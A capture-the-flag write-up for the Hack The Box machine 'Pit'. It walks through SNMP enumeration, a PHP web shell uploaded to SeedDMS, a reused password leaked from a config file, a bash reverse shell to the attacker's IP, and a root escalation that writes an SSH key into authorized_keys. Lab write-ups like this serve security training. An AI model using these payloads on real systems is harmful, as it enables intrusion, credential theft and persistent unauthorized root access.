Hack The Box - Pit

Posted on | In

info_card

Pit is a medium rated machine on HackTheBox created by polarbearer and GibParadox, which is built all around SNMP. We will use SNMP to obtain a directory structure for a website running an application with a known CVE. From this CVE we can get a password which is reused and we gain access to CentOS cockpit as michelle. From there we go back to SNMP, abuse a script that gets triggered by snmpwalk and write a key to root’s authorized_keys file.

User

Nmap

We start our enumeration as usual with an nmap scan against all ports followed by a script and version detection scan. This time we will also scan the top 1000 udp ports.

All ports

1
2
3
4
5
6
7
8
9
10
11
 
$ sudo nmap -p- -oA nmap/allports -T4 10.129.147.172
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-17 05:32 UTC
Nmap scan report for 10.129.147.172
Host is up (0.033s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9090/tcp open  zeus-admin

Nmap done: 1 IP address (1 host up) scanned in 138.44 seconds

Script and version

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
 
$ sudo nmap -sC -sV -p 22,80,9090 -oA nmap/svscan 10.129.147.172
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-17 05:36 UTC
Nmap scan report for 10.129.147.172
Host is up (0.033s latency).

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
|   3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
|   256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_  256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
80/tcp   open  http            nginx 1.14.1
|_http-server-header: nginx/1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
9090/tcp open  ssl/zeus-admin?
| fingerprint-strings:
|   GetRequest, HTTPOptions:
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     Cross-Origin-Resource-Policy: same-origin
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|_    margin: 0 0 10p
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after:  2030-06-04T16:09:12
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9090-TCP:V=7.91%T=SSL%I=7%D=5/17%Time=60A2012E%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,E70,"HTTP/1\.1\x20400\x20Bad\x20request\r\nContent-Type:
...[snip]...
SF:}\n\x20\x20\x20\x20\x20\x20\x20\x20p\x20{\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20margin:\x200\x200\x2010p");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 189.26 seconds

The TCP scan shows three ports being open and also reveals a domain name which we add to our /etc/hosts. We also run an UDP scan against this machine which reveals SNMP being open.

UDP scan

1
2
3
4
5
6
7
8
9
 
$ sudo nmap -sU -oA nmap/udp 10.129.147.172
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-17 05:50 UTC
Nmap scan report for 10.129.147.172
Host is up (0.032s latency).
Not shown: 999 filtered ports
PORT    STATE         SERVICE
161/udp open|filtered snmp

Nmap done: 1 IP address (1 host up) scanned in 1090.66 seconds

SNMP

To get more information out of SNMP we run snmpwalk with version one and the public community string. We also use the default OID for the command.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
 
$ snmpwalk -v1 -c public 10.129.147.172 1.3.6.1.4.1
UCD-SNMP-MIB::prIndex.1 = INTEGER: 1
UCD-SNMP-MIB::prNames.1 = STRING: nginx
UCD-SNMP-MIB::prMin.1 = INTEGER: 1
UCD-SNMP-MIB::prMax.1 = INTEGER: 0
UCD-SNMP-MIB::prCount.1 = INTEGER: 3
UCD-SNMP-MIB::prErrorFlag.1 = INTEGER: noError(0)
UCD-SNMP-MIB::prErrFix.1 = INTEGER: noError(0)
UCD-SNMP-MIB::prErrFixCmd.1 = STRING:
UCD-SNMP-MIB::dskIndex.1 = INTEGER: 1
UCD-SNMP-MIB::dskIndex.2 = INTEGER: 2
UCD-SNMP-MIB::dskPath.1 = STRING: /
UCD-SNMP-MIB::dskPath.2 = STRING: /var/www/html/seeddms51x/seeddms
...[snip]...
Login Name           SELinux User         MLS/MCS Range        Service

__default__          unconfined_u         s0-s0:c0.c1023       *
michelle             user_u               s0                   *
root                 unconfined_u         s0-s0:c0.c1023       *
...[snip]...

This reveals a directory structure in the web folder and also a username.

Seeddms

Going over to the website with the found domain we are greeted with a login screen for SeedDMS. We can login with the credentials michelle:michelle.

seed_dms_login

There exists a known vulnerability for SeedDMS which we can leverage to gain RCE on the target. First we navigate to a folder we have write access to.

seed_dms_add_doc

We click on Add document and upload a php webshell with the following content.

grem.php

1
 
<?php system($_REQUEST['cmd']); ?>

After uploading it we take note of the documentid of the uploaded file.

seed_dms_doc_id

Following the PoC we open the storage location of the uploaded file with the documentid and confirm we have command execution.

rce_poc

We send the request to burp and change the request method to POST for easier handling.

burp_rce

Taking a look around we find a settings.xml file in a conf folder which reveals a password for the database access ied^ieY6xoquu.

burp_read_settings

CentOS Cockpit

Michelle reused this password for the CentOS cockpit running on port 9090, which results in easy access for us.

cockpit_login

Going over to Terminal we can now grab the user flag and continue our way to root.

terminal_user

Root

SNMP RCE

We could finish the machine in the web terminal but for more comfortable access let’s send ourselves a reverse shell back.

1
 
[michelle@pit ~]$ bash -i >& /dev/tcp/10.10.14.80/443 0>&1

We catch the reverse shell with our ncat listener and upgrade it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
 
$ sudo nc -lvnp 443
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.129.147.172.
Ncat: Connection from 10.129.147.172:36914.
[michelle@pit ~]$ script -qc /bin/bash /dev/null
script -qc /bin/bash /dev/null
[michelle@pit ~]$ export TERM=xterm
export TERM=xterm
[michelle@pit ~]$ ^Z
[1]+  Stopped                 sudo nc -lvnp 443
$ stty raw -echo;fg
sudo nc -lvnp 443

[michelle@pit ~]$

Running linpeas reveals an odd ACL entry for the /usr/local/monitoring directory, where the user michelle has write and execute rights but cannot read.

1
2
3
4
5
6
7
8
 
[+] Files with ACLs
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls
# file: /usr/local/monitoring
USER   root      rwx
user   michelle  -wx
GROUP  root      rwx
mask             rwx
other            ---

Going back to our earlier SNMP enumeration we see that /usr/bin/monitor is called.

1
2
3
4
5
6
7
 
...[snip]...
NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/monitor
NET-SNMP-EXTEND-MIB::nsExtendArgs."monitoring" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendInput."monitoring" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."monitoring" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."monitoring" = INTEGER: exec(1)
...[snip]...

Looking at this file we can see it calls all the scripts in the directory we have write-access to with a wildcard in the filename.

1
2
3
4
5
6
7
 
[michelle@pit ~]$ cat /usr/bin/monitor
#!/bin/bash

for script in /usr/local/monitoring/check*sh
do
    /bin/bash $script
done

SeLinux will block most of the commands we can put in this script but we are able to write a ssh key to /root/.ssh/authorized_keys.

check_key.sh

1
2
3
4
5
 
#!/bin/bash

mkdir /root/.ssh

echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMNy7uE1232UpO71JIQ7MBt1U4/43bo/A4PveyCJvIbH+Q1Zy+TA40S/cMWI4oGl0vq0vZPgWv5NK1xUhR+XMYQZuqpuTwZgkMWF1fcOzssmYapiemhchUeP+rANHVsSk3A9CPtLTMiyVFY5aFXnvm0O8gXiw1a6mwEBgX8Se0fEbjqSrvTbQVMmOBo8DI/ZGZYSDpMU/V6va87o7FjbrXkUZQUOWEGI5HPsZbI9VliyL9AhnEQSbxxNvSyobGFL7ew4XmSFpcorSiHwPKwMkJBE3qTnzn3vq/411O4yVElWja9vPolrAeqRb30XHa21zxZrVqWTNK1FaAG5krlZMiYQ+46b9TH+K8wEM4Cj4geq37AdL7kdgIcwYp2ZkPG+F4ETp+tsEVJODIKJD4EzCygNODpz+XVepy3bxHvmFa78SL+CtBYeQpDiRen/EH9racqFD7ZK1n0NaNYwQuVRHvvQK7CChi6BBPYQ5Lt0w16UQG0CABqL2NKRlINDNEam8= jack@parrot' > /root/.ssh/authorized_keys

We chmod our script to be executable and copy it to the monitoring folder.

1
2
 
[michelle@pit ~]$ chmod +x check_key.sh
[michelle@pit ~]$ cp check_key.sh /usr/local/monitoring/

Right afterwards we run our snmpwalk command from earlier which triggers our script to be run.

1
2
3
4
5
 
$ snmpwalk -v1 -c public 10.129.147.172 1.3.6.1.4.1
UCD-SNMP-MIB::prIndex.1 = INTEGER: 1
UCD-SNMP-MIB::prNames.1 = STRING: nginx
UCD-SNMP-MIB::prMin.1 = INTEGER: 1
...[snip]...

Now we can simply ssh into the target as the root user and grab the root flag.

1
2
3
4
5
6
7
8
9
 
$ ssh -i root root@10.129.147.172
Web console: https://pit.htb:9090/

Last login: Tue May 11 04:44:50 2021
[root@pit ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@pit ~]# wc -c /root/root.txt
33 /root/root.txt
[root@pit ~]#